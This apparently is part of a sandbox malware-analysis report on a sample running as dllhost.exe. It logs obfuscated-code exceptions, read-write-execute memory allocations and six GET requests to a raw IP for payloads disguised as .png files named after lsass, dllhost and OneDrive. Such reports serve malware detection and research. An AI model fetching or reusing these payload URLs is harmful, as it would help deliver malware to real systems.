__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb 68 ac 86 b2 56 e9 c3 fa ff ff 5a 8f 04 24 8b exception.symbol: dllhost+0x1a501a exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1724442 exception.address: 0x5a501a registers.esp: 1638240 registers.edi: 12725774 registers.eax: 29767 registers.ebp: 3974000660 registers.edx: 654654 registers.ebx: 776041574 registers.esi: 5916138 registers.ecx: 5907348	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb 50 89 3c 24 c7 04 24 6c c9 cc 74 89 3c 24 c7 exception.symbol: dllhost+0x1a4a9d exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1723037 exception.address: 0x5a4a9d registers.esp: 1638244 registers.edi: 12725774 registers.eax: 29767 registers.ebp: 3974000660 registers.edx: 654654 registers.ebx: 776041574 registers.esi: 5945905 registers.ecx: 5907348	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb 55 bd 00 68 3f 2f e9 22 01 00 00 03 34 24 81 exception.symbol: dllhost+0x1a4655 exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1721941 exception.address: 0x5a4655 registers.esp: 1638244 registers.edi: 12725774 registers.eax: 29767 registers.ebp: 3974000660 registers.edx: 654654 registers.ebx: 0 registers.esi: 5919589 registers.ecx: 2298801283	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb 81 c1 e6 9d e1 59 50 e9 30 f7 ff ff 81 ed 4e exception.symbol: dllhost+0x1b0f91 exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1773457 exception.address: 0x5b0f91 registers.esp: 1638232 registers.edi: 4227874 registers.eax: 26903 registers.ebp: 3974000660 registers.edx: 6 registers.ebx: 48162078 registers.esi: 1968968720 registers.ecx: 5965254	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb 83 ec 04 89 2c 24 89 e5 81 c5 04 00 00 00 81 exception.symbol: dllhost+0x1b0b03 exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1772291 exception.address: 0x5b0b03 registers.esp: 1638236 registers.edi: 4227874 registers.eax: 26903 registers.ebp: 3974000660 registers.edx: 6 registers.ebx: 48162078 registers.esi: 1968968720 registers.ecx: 5992157	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb 55 89 04 24 89 34 24 89 e6 81 c6 04 00 00 00 exception.symbol: dllhost+0x1b0db5 exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1772981 exception.address: 0x5b0db5 registers.esp: 1638236 registers.edi: 4227874 registers.eax: 26903 registers.ebp: 3974000660 registers.edx: 6 registers.ebx: 0 registers.esi: 15291477 registers.ecx: 5967889	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb 55 89 e5 81 c5 04 00 00 00 81 ed 04 00 00 00 exception.symbol: dllhost+0x1b1400 exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1774592 exception.address: 0x5b1400 registers.esp: 1638236 registers.edi: 4227874 registers.eax: 5995835 registers.ebp: 3974000660 registers.edx: 1425504755 registers.ebx: 0 registers.esi: 15291477 registers.ecx: 83981905	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb 51 89 3c 24 53 89 04 24 b8 9c 6e e7 1d e9 51 exception.symbol: dllhost+0x1b1a83 exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1776259 exception.address: 0x5b1a83 registers.esp: 1638236 registers.edi: 4227874 registers.eax: 5970807 registers.ebp: 3974000660 registers.edx: 1425504755 registers.ebx: 1179202795 registers.esi: 0 registers.ecx: 83981905	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb e9 66 04 00 00 05 2f 6d 39 3c 53 55 bd 00 00 exception.symbol: dllhost+0x1b7ecd exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1801933 exception.address: 0x5b7ecd registers.esp: 1638232 registers.edi: 4227874 registers.eax: 31277 registers.ebp: 3974000660 registers.edx: 2130566132 registers.ebx: 1179202795 registers.esi: 5994154 registers.ecx: 3888906240	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb 56 e9 32 fd ff ff 81 e6 2c 04 ff 6e 81 ee 89 exception.symbol: dllhost+0x1b7f02 exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1801986 exception.address: 0x5b7f02 registers.esp: 1638236 registers.edi: 4227874 registers.eax: 31277 registers.ebp: 3974000660 registers.edx: 2130566132 registers.ebx: 1179202795 registers.esi: 6025431 registers.ecx: 3888906240	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb 52 89 34 24 be 4e 52 66 1d e9 16 fe ff ff 89 exception.symbol: dllhost+0x1b7ea0 exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1801888 exception.address: 0x5b7ea0 registers.esp: 1638236 registers.edi: 4227874 registers.eax: 0 registers.ebp: 3974000660 registers.edx: 2130566132 registers.ebx: 1179202795 registers.esi: 5997735 registers.ecx: 604277584	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb e9 48 03 00 00 05 67 fb d8 20 29 c3 58 8b 2c exception.symbol: dllhost+0x1d56b9 exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1922745 exception.address: 0x5d56b9 registers.esp: 1638200 registers.edi: 3888906240 registers.eax: 27762 registers.ebp: 3974000660 registers.edx: 2130566132 registers.ebx: 6115449 registers.esi: 6111040 registers.ecx: 3888906240	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb 56 68 80 03 13 04 89 04 24 89 1c 24 51 89 14 exception.symbol: dllhost+0x1d53e0 exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1922016 exception.address: 0x5d53e0 registers.esp: 1638204 registers.edi: 3888906240 registers.eax: 0 registers.ebp: 3974000660 registers.edx: 2130566132 registers.ebx: 6118383 registers.esi: 6111040 registers.ecx: 116969	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb 57 89 04 24 b8 3e 4e de 7c 57 52 ba 76 22 4f exception.symbol: dllhost+0x1d7676 exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1930870 exception.address: 0x5d7676 registers.esp: 1638200 registers.edi: 6122478 registers.eax: 30823 registers.ebp: 3974000660 registers.edx: 47833921 registers.ebx: 6118383 registers.esi: 6123021 registers.ecx: 0	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb 52 54 5a 81 c2 04 00 00 00 83 ec 04 89 3c 24 exception.symbol: dllhost+0x1d722e exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1929774 exception.address: 0x5d722e registers.esp: 1638204 registers.edi: 6122478 registers.eax: 30823 registers.ebp: 3974000660 registers.edx: 47833921 registers.ebx: 6118383 registers.esi: 6153844 registers.ecx: 0	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb e9 4d 00 00 00 81 e9 eb d6 fc 3e 5d 53 bb 04 exception.symbol: dllhost+0x1d753a exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1930554 exception.address: 0x5d753a registers.esp: 1638204 registers.edi: 4294939128 registers.eax: 30823 registers.ebp: 3974000660 registers.edx: 47833921 registers.ebx: 6118383 registers.esi: 6153844 registers.ecx: 7572840	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb 55 bd db af f3 3d e9 7c fc ff ff b8 41 4f ef exception.symbol: dllhost+0x1d83de exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1934302 exception.address: 0x5d83de registers.esp: 1638200 registers.edi: 6126018 registers.eax: 29581 registers.ebp: 3974000660 registers.edx: 747423406 registers.ebx: 32837210 registers.esi: 6153844 registers.ecx: 1014976217	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb 29 f6 e9 00 00 00 00 ff 34 3e e9 db f6 ff ff exception.symbol: dllhost+0x1d839e exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1934238 exception.address: 0x5d839e registers.esp: 1638204 registers.edi: 6155599 registers.eax: 29581 registers.ebp: 3974000660 registers.edx: 747423406 registers.ebx: 32837210 registers.esi: 6153844 registers.ecx: 1014976217	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 89 2c 24 51 68 ed 65 ce 79 exception.symbol: dllhost+0x1d7c37 exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1932343 exception.address: 0x5d7c37 registers.esp: 1638204 registers.edi: 6155599 registers.eax: 29581 registers.ebp: 3974000660 registers.edx: 747423406 registers.ebx: 32837210 registers.esi: 4294940584 registers.ecx: 677472341	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb 29 d2 ff 34 1a ff 34 24 8b 04 24 83 c4 04 68 exception.symbol: dllhost+0x1d8ff3 exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1937395 exception.address: 0x5d8ff3 registers.esp: 1638204 registers.edi: 6155599 registers.eax: 26594 registers.ebp: 3974000660 registers.edx: 747423406 registers.ebx: 6155934 registers.esi: 4294940584 registers.ecx: 677472341	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb e9 75 00 00 00 c1 ef 02 81 c7 40 ad bf f0 01 exception.symbol: dllhost+0x1d87ec exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1935340 exception.address: 0x5d87ec registers.esp: 1638204 registers.edi: 6155599 registers.eax: 744660365 registers.ebp: 3974000660 registers.edx: 4294943208 registers.ebx: 6155934 registers.esi: 4294940584 registers.ecx: 677472341	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb 50 b8 e0 d0 4a 6a 51 b9 00 5b b5 76 81 f1 d6 exception.symbol: dllhost+0x1dd0e2 exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1954018 exception.address: 0x5dd0e2 registers.esp: 1638200 registers.edi: 6155599 registers.eax: 29498 registers.ebp: 3974000660 registers.edx: 6146536 registers.ebx: 6147157 registers.esi: 4294940584 registers.ecx: 1971716238	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb 56 89 14 24 c7 04 24 10 cf e5 57 e9 76 fd ff exception.symbol: dllhost+0x1dd285 exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1954437 exception.address: 0x5dd285 registers.esp: 1638204 registers.edi: 24811 registers.eax: 4294940192 registers.ebp: 3974000660 registers.edx: 6146536 registers.ebx: 6176655 registers.esi: 4294940584 registers.ecx: 1971716238	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb 68 83 20 a5 3b 8b 04 24 83 c4 04 e9 58 01 00 exception.symbol: dllhost+0x1df305 exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1962757 exception.address: 0x5df305 registers.esp: 1638204 registers.edi: 24811 registers.eax: 28233 registers.ebp: 3974000660 registers.edx: 6184987 registers.ebx: 893569208 registers.esi: 4294940584 registers.ecx: 1411915336	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb 55 51 b9 c4 58 f7 76 57 bf 00 08 2b 68 e9 19 exception.symbol: dllhost+0x1dfbc5 exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1964997 exception.address: 0x5dfbc5 registers.esp: 1638204 registers.edi: 24811 registers.eax: 0 registers.ebp: 3974000660 registers.edx: 6159755 registers.ebx: 64233 registers.esi: 4294940584 registers.ecx: 1411915336	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb e9 ab ff ff ff 87 cf f7 d1 87 cf 4f 81 ef ec exception.symbol: dllhost+0x1e08e0 exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1968352 exception.address: 0x5e08e0 registers.esp: 1638200 registers.edi: 24811 registers.eax: 30159 registers.ebp: 3974000660 registers.edx: 1346335056 registers.ebx: 6160439 registers.esi: 4294940584 registers.ecx: 1411915336	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb 55 bd 3a 25 7d 7c 89 ea 8b 2c 24 81 c4 04 00 exception.symbol: dllhost+0x1e0ca7 exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1969319 exception.address: 0x5e0ca7 registers.esp: 1638204 registers.edi: 3939837675 registers.eax: 0 registers.ebp: 3974000660 registers.edx: 1346335056 registers.ebx: 6163882 registers.esi: 4294940584 registers.ecx: 1411915336	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb 29 c9 ff 34 0f ff 34 24 5b 81 ec 04 00 00 00 exception.symbol: dllhost+0x1e17f1 exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1972209 exception.address: 0x5e17f1 registers.esp: 1638204 registers.edi: 6194180 registers.eax: 28703 registers.ebp: 3974000660 registers.edx: 1935316841 registers.ebx: 1620754379 registers.esi: 4294950859 registers.ecx: 37039	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 89 0c 24 89 2c 24 bd 8c c1 exception.symbol: dllhost+0x1e1550 exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1971536 exception.address: 0x5e1550 registers.esp: 1638204 registers.edi: 6194180 registers.eax: 28703 registers.ebp: 3974000660 registers.edx: 1935316841 registers.ebx: 81129 registers.esi: 4294950859 registers.ecx: 4294941556	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb e9 67 01 00 00 8b 2c 24 81 c4 04 00 00 00 53 exception.symbol: dllhost+0x1ea564 exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 2008420 exception.address: 0x5ea564 registers.esp: 1638204 registers.edi: 6194180 registers.eax: 6233717 registers.ebp: 3974000660 registers.edx: 2130566132 registers.ebx: 6200901 registers.esi: 3974051905 registers.ecx: 2136766005	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb 68 d1 c3 c6 75 e9 b9 00 00 00 68 6a f4 76 6f exception.symbol: dllhost+0x1ea5d7 exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 2008535 exception.address: 0x5ea5d7 registers.esp: 1638204 registers.edi: 76108112 registers.eax: 6233717 registers.ebp: 3974000660 registers.edx: 2130566132 registers.ebx: 4294938300 registers.esi: 3974051905 registers.ecx: 2136766005	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb e9 6e fe ff ff 81 c2 04 00 00 00 81 c2 04 00 exception.symbol: dllhost+0x1fd8d7 exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 2087127 exception.address: 0x5fd8d7 registers.esp: 1638200 registers.edi: 6280603 registers.eax: 32031 registers.ebp: 3974000660 registers.edx: 582600 registers.ebx: 6258256 registers.esi: 6258252 registers.ecx: 3888906240	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb 68 5a 8e ab 1c 89 0c 24 55 c7 04 24 91 db df exception.symbol: dllhost+0x1fd7d9 exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 2086873 exception.address: 0x5fd7d9 registers.esp: 1638204 registers.edi: 6312634 registers.eax: 2515222888 registers.ebp: 3974000660 registers.edx: 4294938116 registers.ebx: 6258256 registers.esi: 6258252 registers.ecx: 3888906240	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 89 0c 24 c7 04 24 38 8f ff exception.symbol: dllhost+0x2085c5 exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 2131397 exception.address: 0x6085c5 registers.esp: 1638204 registers.edi: 6353271 registers.eax: 30601 registers.ebp: 3974000660 registers.edx: 582600 registers.ebx: 2166913 registers.esi: 18762478 registers.ecx: 6903525	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (6 events)

suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://62.204.41.23/o.png
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://62.204.41.23/file.png
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://62.204.41.23/r.png
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://62.204.41.23/OneDrive.png
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://62.204.41.23/dllhost.png
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://62.204.41.23/lsass.png

Performs some HTTP requests (6 events)

request	GET http://62.204.41.23/o.png
request	GET http://62.204.41.23/file.png
request	GET http://62.204.41.23/r.png
request	GET http://62.204.41.23/OneDrive.png
request	GET http://62.204.41.23/dllhost.png
request	GET http://62.204.41.23/lsass.png

Allocates read-write-execute memory (usually to unpack itself) (50 out of 956 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory May 6, 2023, 11:58 a.m.	process_identifier: 2556 region_size: 2555904 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000760000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 6, 2023, 11:58 a.m.	process_identifier: 2556 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000950000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 6, 2023, 11:58 a.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a71000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 6, 2023, 11:58 a.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef410b000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 6, 2023, 11:58 a.m.	process_identifier: 2556 region_size: 851968 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000b60000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 6, 2023, 11:58 a.m.	process_identifier: 2556 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000bb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 6, 2023, 11:58 a.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a72000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 6, 2023, 11:58 a.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a72000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 6, 2023, 11:58 a.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a72000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 6, 2023, 11:58 a.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a72000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 6, 2023, 11:58 a.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a72000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 6, 2023, 11:58 a.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a72000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 6, 2023, 11:58 a.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a72000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 6, 2023, 11:58 a.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a72000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 6, 2023, 11:58 a.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a72000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 6, 2023, 11:58 a.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a72000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 6, 2023, 11:58 a.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a72000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 6, 2023, 11:58 a.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a74000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 6, 2023, 11:58 a.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a74000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 6, 2023, 11:58 a.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a74000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 6, 2023, 11:58 a.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a74000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 6, 2023, 11:58 a.m.	process_identifier: 2556 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 6, 2023, 11:58 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 6, 2023, 11:58 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 6, 2023, 11:58 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 6, 2023, 11:58 a.m.	process_identifier: 2556 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 6, 2023, 11:58 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 6, 2023, 11:58 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe942ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 6, 2023, 11:58 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9439c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 6, 2023, 11:58 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe943c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 6, 2023, 11:58 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe943a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 6, 2023, 11:58 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe942fc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 6, 2023, 11:58 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94410000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 6, 2023, 11:58 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe942fa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 6, 2023, 11:58 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe942eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 6, 2023, 11:58 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe942e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 6, 2023, 11:58 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9430b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
